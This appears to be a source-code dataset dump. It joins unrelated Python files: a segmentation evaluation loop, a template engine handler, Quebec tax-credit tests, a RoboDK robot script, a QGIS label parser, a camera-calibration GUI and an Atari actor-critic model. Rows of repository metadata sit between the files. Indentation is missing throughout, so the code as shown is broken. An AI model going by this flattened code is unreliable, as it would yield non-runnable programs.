images = np.zeros((batch_size,) + image.shape, dtype=image.dtype)
masks = np.zeros((batch_size,) + mask.shape, dtype=mask.dtype)
batch_index = i // batch_size
image_index = i % batch_size
images[image_index] = image
masks[image_index] = mask
if i == len(dataset) - 1 or image_index == batch_size - 1:
output = model.predict(images)
for j in range(image_index + 1):
confusion = calc_segmentation_confusion(
output[j], masks[j], nb_classes)
metrics = calc_segmentation_metrics(confusion)
dice = metrics['dice']
surface_dice = calc_surface_dice(output[j], masks[j], nb_classes, tolerance=sdice_tolerance)
isolated_fp = calc_isolated_fp(output[j], masks[j], nb_classes)
weighted_dice = calc_weighted_dice(
confusion, isolated_fp, nb_classes, isolated_fp_weights=isolated_fp_weights)
result_image = get_imageset(
images[j], output[j], masks[j],
put_text = f'dice: {np.round(dice, 3)} ' \
f'surface dice: {np.round(surface_dice, 3)} ' \
f'weighted dice: {np.round(weighted_dice, 3)}')
data_index = batch_index * batch_size + j
*input_file, _ = dataset.annotations[data_index]
image_path = Path(input_file[0])
save_image_dir = Path(save_dir) / image_path.parent.name
save_image_dir.mkdir(exist_ok=True)
save_image_path = str(save_image_dir / image_path.name)
image_dice_list.append([save_image_path, dice])
dice_list.append(dice)
surface_dice_list.append([save_image_path, surface_dice])
result_image_out = result_image[:, :, ::-1] # RGB => BGR
cv2.imwrite(save_image_path, result_image_out)
confusion_all += confusion
isolated_fp_all += isolated_fp
images[:] = 0
masks[:] = 0
with open(f"{save_dir}/dice.json", "w") as fw:
json.dump(image_dice_list, fw, ensure_ascii=True, indent=4)
with open(f"{save_dir}/surface_dice.json", "w") as fw:
json.dump(surface_dice_list, fw, ensure_ascii=True, indent=4)
dice_class_axis = np.array(dice_list).T.tolist()
for i in range(len(dice_class_axis)):
plt.figure()
plt.hist(dice_class_axis[i])
plt.savefig(f"{save_dir}/dice_hist_class_{i}.png")
metrics = calc_segmentation_metrics(confusion_all)
# append surface_dice and weighted_dice to metrics
mean_surface_dice = np.mean(list(map(lambda x: x[1], surface_dice_list)), axis=0)
metrics['surface_dice'] = [float(x) for x in mean_surface_dice]
metrics['weighted_dice'] = calc_weighted_dice(
confusion_all, isolated_fp_all, nb_classes, isolated_fp_weights=isolated_fp_weights)
return metrics
| 34.981818
| 116
| 0.628638
| 1,540
| 11,544
| 4.485065
| 0.166883
| 0.037788
| 0.034458
| 0.014768
| 0.357029
| 0.306645
| 0.241639
| 0.22137
| 0.185609
| 0.164181
| 0
| 0.011258
| 0.261348
| 11,544
| 329
| 117
| 35.088146
| 0.798757
| 0.109061
| 0
| 0.237668
| 0
| 0
| 0.049478
| 0.010743
| 0
| 0
| 0
| 0
| 0.008969
| 1
| 0.058296
| false
| 0
| 0.044843
| 0
| 0.156951
| 0.022422
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afa04ed205e39049b31fa8fd4108f5232fadca75
| 1,774
|
py
|
Python
|
mrbaviirc/template/actions/action_var.py
|
brianvanderburg2/python-mrbaviirc-template
|
6da213b30580d66fe7231c40bb7bbebb026a0789
|
[
"Apache-2.0"
] | null | null | null |
mrbaviirc/template/actions/action_var.py
|
brianvanderburg2/python-mrbaviirc-template
|
6da213b30580d66fe7231c40bb7bbebb026a0789
|
[
"Apache-2.0"
] | null | null | null |
mrbaviirc/template/actions/action_var.py
|
brianvanderburg2/python-mrbaviirc-template
|
6da213b30580d66fe7231c40bb7bbebb026a0789
|
[
"Apache-2.0"
] | null | null | null |
""" Handler for the var action tag. """
# pylint: disable=too-few-public-methods,too-many-arguments,protected-access,unused-argument
__author__ = "Brian Allen Vanderburg II"
__copyright__ = "Copyright 2016-2019"
__license__ = "Apache License 2.0"
from . import ActionHandler, DefaultActionHandler
from ..nodes import Node, NodeList
from ..renderers import StringRenderer
class VarNode(Node):
""" Capture output into a variable. """
def __init__(self, template, line, var):
""" Initialize. """
Node.__init__(self, template, line)
self.var = var
self.nodes = NodeList()
def render(self, state):
""" Render the results and capture into a variable. """
new_renderer = state.push_renderer()
try:
self.nodes.render(state)
contents = new_renderer.get()
state.set_var(self.var[0], contents, self.var[1])
finally:
state.pop_renderer()
class VarActionHandler(ActionHandler):
""" Handle var """
def handle_action_var(self, line, start, end):
""" Handle var """
var = self.parser.get_token_var(start, end, allow_type=True)
start += 1
self.parser.get_no_more_tokens(start, end)
node = VarNode(self.template, line, var)
self.parser.add_node(node)
self.parser.push_nodestack(node.nodes)
self.parser.push_handler(VarSubHandler(self.parser, self.template))
class VarSubHandler(DefaultActionHandler):
""" Handle items under var """
def handle_action_endvar(self, line, start, end):
""" endvar """
self.parser.get_no_more_tokens(start, end)
self.parser.pop_nodestack()
self.parser.pop_handler()
ACTION_HANDLERS = {"var": VarActionHandler}
| 28.612903
| 92
| 0.653326
| 210
| 1,774
| 5.309524
| 0.404762
| 0.080717
| 0.043049
| 0.035874
| 0.059193
| 0.059193
| 0.059193
| 0.059193
| 0
| 0
| 0
| 0.009489
| 0.227734
| 1,774
| 61
| 93
| 29.081967
| 0.80438
| 0.155017
| 0
| 0.058824
| 0
| 0
| 0.044828
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.088235
| 0
| 0.294118
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afa0c7a4dbfb00577736a7f5962a39c917e15a9e
| 1,623
|
py
|
Python
|
tests/test_exp_worker_cred.py
|
RogerEMO/srd
|
40eb8bb02cfd3b1f60ed9eb3e361877fea744cb5
|
[
"MIT"
] | 1
|
2021-11-22T18:15:09.000Z
|
2021-11-22T18:15:09.000Z
|
tests/test_exp_worker_cred.py
|
RogerEMO/srd
|
40eb8bb02cfd3b1f60ed9eb3e361877fea744cb5
|
[
"MIT"
] | 3
|
2021-05-10T18:46:16.000Z
|
2021-06-01T16:51:48.000Z
|
tests/test_exp_worker_cred.py
|
RogerEMO/srd
|
40eb8bb02cfd3b1f60ed9eb3e361877fea744cb5
|
[
"MIT"
] | 1
|
2021-05-05T17:20:06.000Z
|
2021-05-05T17:20:06.000Z
|
import pytest
from math import isclose
import sys
sys.path.append('/Users/pyann/Dropbox (CEDIA)/srd/Model')
import srd
from srd import quebec
# I use https://cffp.recherche.usherbrooke.ca/outils-ressources/guide-mesures-fiscales/credit-impot-prolongation-carriere/
# since they don't seem to adjust for taxable income (lines 37 and 38, grille de calcul),
# we add some non-work income to avoid a reduction
@pytest.mark.parametrize('age, amount', [(59, 0), (60, 1500), (64, 1500),
(65, 1650), (70, 1650)])
def test_age(age, amount):
p = srd.Person(age=age, earn=30e3, othtax=10e3)
hh = srd.Hhold(p, prov='qc')
qc_form = quebec.form(2019)
qc_form.file(hh)
assert isclose(qc_form.get_exp_worker_cred(p), amount, abs_tol=1)
@pytest.mark.parametrize('work_inc, amount', [(5000, 0), (20e3, 1500),
(34610, 1500), (64610, 0), (49610, 750)])
def test_work_inc_63(work_inc, amount):
p = srd.Person(age=63, earn=work_inc, othtax=10e3)
hh = srd.Hhold(p, prov='qc')
qc_form = quebec.form(2019)
qc_form.file(hh)
assert isclose(qc_form.get_exp_worker_cred(p), amount, abs_tol=1)
@pytest.mark.parametrize('work_inc, amount', [(5000, 0), (20e3, 1650),
(34610, 1650), (67610, 0), ((34610+67610)/2, 825)])
def test_work_inc_66(work_inc, amount):
p = srd.Person(age=66, earn=work_inc, othtax=20e3)
hh = srd.Hhold(p, prov='qc')
qc_form = quebec.form(2019)
qc_form.file(hh)
assert isclose(qc_form.get_exp_worker_cred(p), amount, abs_tol=1)
| 36.066667
| 123
| 0.637708
| 249
| 1,623
| 4.02008
| 0.413655
| 0.053946
| 0.051948
| 0.047952
| 0.470529
| 0.451548
| 0.451548
| 0.3996
| 0.3996
| 0.3996
| 0
| 0.111373
| 0.214418
| 1,623
| 44
| 124
| 36.886364
| 0.673725
| 0.158349
| 0
| 0.4
| 0
| 0
| 0.066009
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.1
| false
| 0
| 0.166667
| 0
| 0.266667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afa13b4e4fc345a627c690ebb66190bf2e512666
| 1,382
|
py
|
Python
|
Prog1.py
|
tudoriliuta/UR3RL
|
9a98d530318f5931ddc195d8ffa7ebc406cd6419
|
[
"MIT"
] | 1
|
2019-05-23T14:26:21.000Z
|
2019-05-23T14:26:21.000Z
|
Prog1.py
|
tudoriliuta/UR3RL
|
9a98d530318f5931ddc195d8ffa7ebc406cd6419
|
[
"MIT"
] | null | null | null |
Prog1.py
|
tudoriliuta/UR3RL
|
9a98d530318f5931ddc195d8ffa7ebc406cd6419
|
[
"MIT"
] | null | null | null |
# Type help("robolink") or help("robodk") for more information
# Press F5 to run the script
# Documentation: https://robodk.com/doc/en/RoboDK-API.html
# Reference: https://robodk.com/doc/en/PythonAPI/index.html
# Note: It is not required to keep a copy of this file, your python script is saved with the station
from robolink import * # RoboDK's API
from robodk import * # Math toolbox for robots
# Start the RoboDK API:
RDK = Robolink()
# Get the robot item by name:
robot = RDK.Item('UR3', ITEM_TYPE_ROBOT)
# Get the reference target by name:
R = 100
for i in range(2):
target = RDK.Item('Target %s' % (i+1))
target_pose = target.Pose()
xyz_ref = target_pose.Pos()
# Move the robot to the reference point:
robot.MoveJ(target)
# Draw a hexagon around the reference target:
for i in range(7):
ang = i * 2 * pi / 6 # ang = 0, 60, 120, ..., 360
# Calculate the new position around the reference:
x = xyz_ref[0] + R * cos(ang) # new X coordinate
y = xyz_ref[1] + R * sin(ang) # new Y coordinate
z = xyz_ref[2] # new Z coordinate
target_pose.setPos([x,y,z])
# Move to the new target:
robot.MoveL(target_pose)
# Trigger a program call at the end of the movement
# robot.RunCode('Program_Done')
# Move back to the reference target:
robot.MoveL(target)
| 32.139535
| 100
| 0.644718
| 218
| 1,382
| 4.036697
| 0.458716
| 0.068182
| 0.061364
| 0.038636
| 0.043182
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021174
| 0.248191
| 1,382
| 42
| 101
| 32.904762
| 0.825794
| 0.560781
| 0
| 0
| 0
| 0
| 0.020513
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.111111
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afa4b7d2595f4e0c541626173ba9e42640a0a707
| 6,471
|
py
|
Python
|
ekmap_core/qgslabel_parser/label_parser.py
|
eKMap/ekmap-publisher-for-qgis
|
cb9dac6c29be3617c2155c1e38d9d1dffbdbad96
|
[
"MIT"
] | 4
|
2020-11-11T07:07:55.000Z
|
2022-02-22T02:39:01.000Z
|
ekmap_core/qgslabel_parser/label_parser.py
|
eKMap/ekmap-publisher-for-qgis
|
cb9dac6c29be3617c2155c1e38d9d1dffbdbad96
|
[
"MIT"
] | 2
|
2021-03-17T17:46:56.000Z
|
2021-03-18T08:19:04.000Z
|
ekmap_core/qgslabel_parser/label_parser.py
|
eKMap/ekmap-publisher-for-qgis
|
cb9dac6c29be3617c2155c1e38d9d1dffbdbad96
|
[
"MIT"
] | 1
|
2021-10-31T21:00:55.000Z
|
2021-10-31T21:00:55.000Z
|
from PyQt5.QtWidgets import QMainWindow
from ..ekmap_converter import eKConverter
import re
from qgis.core import QgsMessageLog
class LabelParser:
def __init__(self, labeling):
self.labeling = labeling
def _readTextStyle(self, settings):
labelFormat = settings.format()
field = settings.fieldName
finds = re.findall(r"\((.*?)\)", field)
if (len(finds) == 1):
field = finds[0]
xOffset = float(settings.xOffset)
yOffset = float(settings.yOffset)
offsetUnit = settings.offsetUnits
xOffset = eKConverter.convertUnitToPixel(value=xOffset, unit=offsetUnit)
yOffset = eKConverter.convertUnitToPixel(value=yOffset, unit=offsetUnit)
if xOffset == 0 and yOffset == 0:
yOffset = -1.5
fontName = labelFormat.font().family()
fontColor = labelFormat.color().name()
# fontStyle = labelFormat.namedStyle()
fontSize = float(labelFormat.size())
fontSizeUnit = labelFormat.sizeUnit()
# convert the size to pixel
fontSize = eKConverter.convertUnitToPixel(value = fontSize, unit = fontSizeUnit)
# Refer: https://qgis.org/api/classQgsTextBufferSettings.html
strokeColor = labelFormat.buffer().color().name()
strokeWidth = labelFormat.buffer().size()
strokeWidthUnit = labelFormat.buffer().sizeUnit()
# convert the width to pixel
strokeWidth = eKConverter.convertUnitToPixel(value = strokeWidth, unit = strokeWidthUnit)
# TEMP
placement = settings.placement
placement = eKConverter.convertLabelPlacement(placement)
# Export information here
labelPaint = {
'text-color': fontColor,
'text-halo-color': strokeColor,
'text-halo-width': strokeWidth,
}
labelLayout = {
'text-font': [fontName],
'text-field': ["get", field],
'text-size': fontSize,
'text-offset': [xOffset, yOffset],
'text-anchor': self.__getAnchor(settings),
'text-rotate': self.__getRotation(settings),
'symbol-placement': placement,
}
return {
'type': 'symbol',
'paint': labelPaint,
'layout': labelLayout
}
def readZoomLevel(self, settings):
minLevel = 0
maxLevel = 22
if settings.scaleVisibility:
minLevel = eKConverter.convertScaleToLevel(scale = settings.minimumScale)
if settings.maximumScale != 0:
maxLevel = eKConverter.convertScaleToLevel(scale = settings.maximumScale)
# Export information here
return {
'minLevel': minLevel,
'maxLevel': maxLevel,
'visible': True
}
# Refer: https://qgis.org/pyqgis/3.0/core/Text/QgsTextBackgroundSettings.html
def readBackground(self, settings):
background = settings().format().background()
if background.enabled():
# Identify the type of background
# Refer: https://qgis.org/api/classQgsTextBackgroundSettings.html#a91794614626586cc1f3d861179cc26f9
# basic shape like: rectangle = 0,
# square = 1, eclipse = 2, circle = 3
# or svg image = 4
# or marker symbol = 5
backgroundType = background.type()
# Identify the type of size
# Refer: https://qgis.org/api/classQgsTextBackgroundSettings.html#a45798d989b02e1dfcad9a6f1db4cd153
# 1 = buffer: the size of background = size of label + buffer
# 2 = fixed: the size of background = fixed
# 3 = percent: determine by the size of text size
# sizeType = background.sizeType()
# Get the size information
# this return QSizeF object
size = background.size()
width = size.width()
height = size.height()
# Identify the unit of size
sizeUnit = background.sizeUnit()
# then convert the size to pixel
width = eKConverter.convertUnitToPixel(value = width, unit = sizeUnit)
height = eKConverter.convertUnitToPixel(value = height, unit = sizeUnit)
# Get the fill and stroke
# apply for basic shape only
if backgroundType < 4:
# fillColor = background.fillColor().name()
# strokeColor = background.strokeColor().name()
strokeWidth = background.strokeWidth()
strokeWidthUnit = background.strokeWidthUnit()
# convert the width to pixel
strokeWidth = eKConverter.convertUnitToPixel(value = strokeWidth, unit = strokeWidthUnit)
# Export information here
# ...
def readPlacement(self, settings):
layerType = settings.layerType()
# Refer: https://qgis.org/api/classQgsWkbTypes.html#a60e72c2f73cb07fdbcdbc2d5068b5d9c
# POINT
if layerType == 0:
# Point has: Cartographic (6),
# around point (0),
# offset from point (1)
a = 1
# LINESTRING
elif layerType == 1:
# Line has: Parallel, curved, horizontal
a = 2
# POLYGON
elif layerType == 2:
# Polygon has: Offset from point, horizontal,
# around centroid, free, using perimeter,
# using perimeter (curved), outside polygons
a = 3
def __getAnchor(self, settings):
placement = settings.placement
# Only offset from point has Anchor
if placement == 1:
quadOffset = settings.quadOffset
return eKConverter.convertQuadrantToAnchor(quadOffset)
# Other set default
else:
return 'bottom'
def __getRotation(self, settings):
# In-case user defined rotation:
definedProperties = settings.dataDefinedProperties()
LABEL_ROTATION = 96
rotationProperty = definedProperties.property(LABEL_ROTATION)
if rotationProperty.isActive():
fieldBase = rotationProperty.field()
return ['get', fieldBase]
else:
placement = settings.placement
# Only offset from point has Rotation
if placement == 1:
return settings.angleOffset
else:
return 0
| 36.767045
| 111
| 0.591871
| 567
| 6,471
| 6.726631
| 0.326279
| 0.053225
| 0.062402
| 0.022286
| 0.125852
| 0.104352
| 0.104352
| 0.076036
| 0.050865
| 0.050865
| 0
| 0.021808
| 0.319734
| 6,471
| 176
| 112
| 36.767045
| 0.844616
| 0.245403
| 0
| 0.115385
| 0
| 0
| 0.03765
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.067308
| false
| 0
| 0.038462
| 0
| 0.182692
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afa690096a6121167933e215558dabc81606d2f3
| 8,069
|
py
|
Python
|
main.py
|
lyffly/CameraCalibration
|
aacdcc9ea711154060f078f0564f8143077cac88
|
[
"BSD-3-Clause"
] | null | null | null |
main.py
|
lyffly/CameraCalibration
|
aacdcc9ea711154060f078f0564f8143077cac88
|
[
"BSD-3-Clause"
] | null | null | null |
main.py
|
lyffly/CameraCalibration
|
aacdcc9ea711154060f078f0564f8143077cac88
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# coding by liuyunfei
# 2020-4-12
import sys
from PyQt5.QtWidgets import QApplication, QMainWindow, QMessageBox
from PyQt5.QtCore import QThread, pyqtSignal, QDateTime, QObject, QMutexLocker, QMutex, QTimer
from PyQt5.QtGui import QPixmap
from PyQt5 import Qt, QtCore
from PyQt5.QtCore import QByteArray
from PyQt5.QtGui import QPixmap, QImage
import os
import cv2
import time
import glob
import numpy as np
from copy import deepcopy
from ui.ui import *
image_mutex = QMutex()
image = None
org_img = None
camera_mutex = QMutex()
num_i = 0
def cv2img_to_Qpixmap(frame):
if len(frame.shape) == 2:
cvRGBImg = cv2.cvtColor(frame,cv2.COLOR_GRAY2RGB)
elif len(frame.shape) == 3:
cvRGBImg = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
h,w,c = cvRGBImg.shape
cvRGBImg = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
qimg = QImage(cvRGBImg.data, w, h, c*w, QImage.Format_RGB888)
pixmap01 = QPixmap.fromImage(qimg)
pix = QPixmap(pixmap01)
return pix
class UpdateImg(QObject):
update_pix1 = pyqtSignal(list)
def __init__(self):
super(UpdateImg, self).__init__()
self.image = None
def run(self):
fnames = glob.glob("imgs/*.png")
allCorners = []
allIds = []
for name in fnames:
im = cv2.imread(name,1)
dictionary = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_4X4_50)
board = cv2.aruco.CharucoBoard_create(7, 9, .015, .0111, dictionary) #0.025单位是米
corners, ids, rejected = cv2.aruco.detectMarkers(im, dictionary)
print(len(corners))
if corners == None or len(corners) == 0:
continue
ret, charucoCorners, charucoIds = cv2.aruco.interpolateCornersCharuco(corners, ids, im, board) #其中的参数依赖于detectMarkers检测的初始值
if corners is not None and charucoIds is not None:
if len(corners) == 31:
allCorners.append(charucoCorners)
allIds.append(charucoIds)
cv2.aruco.drawDetectedMarkers(im,corners,ids)
self.update_pix1.emit([im])
time.sleep(0.1)
w,h=im.shape[1],im.shape[0]
ret, K, dist_coef, rvecs, tvecs = cv2.aruco.calibrateCameraCharuco(allCorners, allIds, board,(w,h),None,None)
dist_coef = dist_coef[0]
txt = "Matrix =\n {0}\nDist_coef =\n {1}\n{2}\n{3}\n{4}\n{5}\n\n- {6}".format(K,dist_coef[0],dist_coef[1],\
dist_coef[2],dist_coef[3],dist_coef[4],"By:Liu Yunfei")
self.update_pix1.emit([None,txt])
class ColorImageThread(QObject):
update_pix1 = pyqtSignal(list)
def __init__(self):
super(ColorImageThread, self).__init__()
def run(self):
global image
global image_mutex
while True:
image_mutex.lock()
img = deepcopy(image)
image_mutex.unlock()
if img is not None:
self.update_pix1.emit([img])
time.sleep(0.02)
class MyWindow(QMainWindow,Ui_Dialog):
def __init__(self, parent=None):
super(MyWindow, self).__init__(parent)
self.setupUi(self)
self.open_camera_button.clicked.connect(self.OnOpenCameraBtn)
self.capture_button.clicked.connect(self.OnCaptureBtn)
self.close_camera_button.clicked.connect(self.OnCloseCameraBtn)
self.cali_button.clicked.connect(self.OnCaliBtn)
self.set_button.clicked.connect(self.getSetInfo)
self.image_label.setScaledContents(False)
self.setWindowTitle("Camera Calibration using ChAruco by LiuYunfei")
self.timer = QTimer()
self.timer.timeout.connect(self.timerEvent)
self.camera_image = None
self.camera_no = 0
self.camera_width = 0
self.camera_height = 0
self.aruco_width = 0
self.aruco_height = 0
self.save_folder = ""
self.cap = None
self.sleep = False
self.getSetInfo()
def getSetInfo(self):
camera_no = self.lineEdit1.text()
camera_width = self.lineEdit2.text()
camera_height = self.lineEdit3.text()
aruco_width = self.lineEdit4.text()
aruco_height = self.lineEdit5.text()
self.camera_no = int(camera_no)
self.camera_width = int(camera_width)
self.camera_height = int(camera_height)
self.aruco_width = int(aruco_width)
self.aruco_height = int(aruco_height)
def timerEvent(self):
global image
global org_img
global image_mutex
if self.sleep ==False:
time.sleep(2)
self.sleep = True
camera_mutex.lock()
ret,frame = self.cap.read()
camera_mutex.unlock()
if ret:
image_mutex.lock()
org_img = deepcopy(frame)
image_mutex.unlock()
dd = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_4X4_50)
board = cv2.aruco.CharucoBoard_create(self.aruco_width, self.aruco_height, .015, .0111, dd)#0.025单位是米
corners, ids, rejected = cv2.aruco.detectMarkers(frame,dd)
if corners == None or len(corners) == 0:
pass
else:
cv2.aruco.drawDetectedMarkers(frame,corners,ids)
image_mutex.lock()
image = deepcopy(frame)
image_mutex.unlock()
def updateColorImage(self,list_tmp):
img = list_tmp[0]
if img is not None:
qimg = cv2img_to_Qpixmap(img)
pix2 = qimg.scaled(800, 600, QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation)
self.image_label.setPixmap(pix2)
if len(list_tmp) > 1:
text = list_tmp[1]
self.label_result.setText(text)
def OnOpenCameraBtn(self):
self.cap = cv2.VideoCapture(self.camera_no)
fps = self.cap.get(cv2.CAP_PROP_FPS)
print("FPS = {} fps".format(fps))
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH,self.camera_width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT,self.camera_height)
time.sleep(0.5)
self.timer.start(30)
self.updataImg = ColorImageThread()
self.updataImg.update_pix1.connect(self.updateColorImage)
self.uithread1 = QThread()
self.updataImg.moveToThread(self.uithread1)
self.uithread1.started.connect(self.updataImg.run)
self.uithread1.start()
def OnCaliBtn(self):
global image
global image_mutex
self.updateimg = UpdateImg()
self.updateimg.update_pix1.connect(self.updateColorImage)
self.ui2 = QThread()
self.updateimg.moveToThread(self.ui2)
self.ui2.started.connect(self.updateimg.run)
self.ui2.start()
def UpdateTimeUI(self,data):
self.label_result.setText(data)
def OnCaptureBtn(self):
global image
global image_mutex
global org_img
global num_i
image_mutex.lock()
img = deepcopy(org_img)
image_mutex.unlock()
name = "imgs/{}.png".format(num_i)
cv2.imwrite(name,img)
print("({}),img saved. {}".format(num_i,name))
num_i +=1
def OnCloseCameraBtn(self):
self.timer.stop()
self.updataImg.disconnect()
#self.updataImg.update_pix1.disconnect()
self.uithread1.terminate()
camera_mutex.lock()
self.cap.release()
camera_mutex.unlock()
if __name__ == '__main__':
app = QApplication(sys.argv)
myWin = MyWindow()
myWin.show()
sys.exit(app.exec_())
| 34.33617
| 137
| 0.587433
| 919
| 8,069
| 5.002176
| 0.249184
| 0.028279
| 0.021753
| 0.026104
| 0.224712
| 0.159452
| 0.114422
| 0.075266
| 0.054818
| 0.03437
| 0
| 0.027903
| 0.311563
| 8,069
| 234
| 138
| 34.482906
| 0.79964
| 0.01735
| 0
| 0.17801
| 0
| 0.005236
| 0.023292
| 0.003643
| 0
| 0
| 0
| 0
| 0
| 1
| 0.073298
| false
| 0.005236
| 0.073298
| 0
| 0.17801
| 0.015707
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
afaaa12bee233defec8a78a507b98355a9769f87
| 11,423
|
py
|
Python
|
actorcritic/envs/atari/model.py
|
jrobine/actor-critic
|
2f72d296c0b550982b0400b6afb7a7a0dfe3f144
|
[
"MIT"
] | 10
|
2018-07-31T21:04:02.000Z
|
2022-02-03T18:58:45.000Z
|
actorcritic/envs/atari/model.py
|
jrobine/actor-critic
|
2f72d296c0b550982b0400b6afb7a7a0dfe3f144
|
[
"MIT"
] | null | null | null |
actorcritic/envs/atari/model.py
|
jrobine/actor-critic
|
2f72d296c0b550982b0400b6afb7a7a0dfe3f144
|
[
"MIT"
] | 1
|
2018-08-01T18:09:35.000Z
|
2018-08-01T18:09:35.000Z
|
"""An implementation of an actor-critic model that is aimed at Atari games."""
import gym
import numpy as np
import tensorflow as tf
import actorcritic.nn as nn
from actorcritic.baselines import StateValueFunction
from actorcritic.model import ActorCriticModel
from actorcritic.policies import SoftmaxPolicy
class AtariModel(ActorCriticModel):
"""An :obj:`~actorcritic.model.ActorCriticModel` that follows the A3C and ACKTR paper.
The observations are sent to three convolutional layers followed by a fully connected layer, each using rectifier
activation functions (ReLU). The policy and the baseline use fully connected layers built on top of the last hidden
fully connected layer separately. The policy layer has one unit for each action and its outputs are used as logits
for a categorical distribution (softmax). The baseline layer has only one unit which represents its value.
The weights of the layers are orthogonally initialized.
Detailed network architecture:
- Conv2D: 32 filters 8x8, stride 4
- ReLU
- Conv2D: 64 filters 4x4, stride 2
- ReLU
- Conv2D: 64 filters 3x3, stride 1 (number of filters based on argument `conv3_num_filters`)
- Flatten
- Fully connected: 512 units
- ReLU
- Fully connected (policy): units = number of actions / Fully connected (baseline): 1 unit
A2C uses 64 filters in the third convolutional layer. ACKTR uses 32.
The policy is a :obj:`~actorcritic.policies.SoftmaxPolicy`.
The baseline is a :obj:`~actorcritic.baselines.StateValueFunction`.
See Also:
This network architecture was originally used in: https://www.nature.com/articles/nature14236
"""
def __init__(self, observation_space, action_space, conv3_num_filters=64, random_seed=None, name=None):
"""
Args:
observation_space (:obj:`gym.spaces.Space`):
A space that determines the shape of the :attr:`observations_placeholder` and the
:attr:`bootstrap_observations_placeholder`.
action_space (:obj:`gym.spaces.Space`):
A space that determines the shape of the :attr:`actions_placeholder`.
conv3_num_filters (:obj:`int`, optional):
Number of filters used for the third convolutional layer, defaults to 64. ACKTR uses 32.
random_seed (:obj:`int`, optional):
A random seed used for sampling from the `~actorcritic.policies.SoftmaxPolicy`.
name (:obj:`string`, optional):
A name for this model.
"""
super().__init__(observation_space, action_space)
assert isinstance(action_space, gym.spaces.Discrete)
assert isinstance(observation_space, gym.spaces.Box)
self._num_actions = action_space.n
self._conv3_num_filters = conv3_num_filters
self._name = name
# TODO
# used to convert the outputs of the policy and the baseline back to the batch-major format of the inputs
# because the values are flattened in between
with tf.name_scope('shapes'):
observations_shape = tf.shape(self.observations_placeholder)
with tf.name_scope('input_shape'):
input_shape = observations_shape[:2]
with tf.name_scope('batch_size'):
batch_size = input_shape[0]
with tf.name_scope('num_steps'):
num_steps = input_shape[1]
with tf.name_scope('bootstrap_input_shape'):
bootstrap_input_shape = tf.shape(self.bootstrap_observations_placeholder)[:1]
num_stack = observation_space.shape[-1]
# the observations are passed in uint8 to save memory and then converted to scalars in range [0,1] on the gpu
# by dividing by 255
with tf.name_scope('normalized_observations'):
normalized_observations = tf.cast(self.observations_placeholder, dtype=tf.float32) / 255.0
normalized_bootstrap_observations = tf.cast(self.bootstrap_observations_placeholder,
dtype=tf.float32) / 255.0
# convert from batch-major format [environment, step] to one flat vector [environment * step] by stacking the
# steps of each environment
# this is necessary since the neural network operations only support batch inputs
with tf.name_scope('flat_observations'):
self._flat_observations = tf.stop_gradient(
tf.reshape(normalized_observations, (-1,) + observation_space.shape))
flat_bootstrap_observations = tf.stop_gradient(
tf.reshape(normalized_bootstrap_observations, (-1,) + observation_space.shape))
with tf.variable_scope(self._name, 'AtariModel'):
self._params = dict()
# create parameters for all layers
self._build_params(num_input_channels=num_stack)
# create layers for the policy and the baseline that use the standard observations as input
self._preactivations, self._activations = self._build_layers(self._flat_observations, build_policy=True)
# create layers for the bootstrap values that use the next observations as input
_, bootstrap_activations = self._build_layers(flat_bootstrap_observations, build_policy=False)
with tf.name_scope('policy'):
policy_logits = tf.reshape(self._activations['fc_policy'], [batch_size, num_steps, self._num_actions])
self._policy = SoftmaxPolicy(policy_logits, self.actions_placeholder, random_seed)
with tf.name_scope('baseline'):
baseline_logits = tf.reshape(self._activations['fc_baseline'], input_shape)
self._baseline = StateValueFunction(baseline_logits)
with tf.name_scope('bootstrap_values'):
self._bootstrap_values = tf.reshape(bootstrap_activations['fc_baseline'], bootstrap_input_shape)
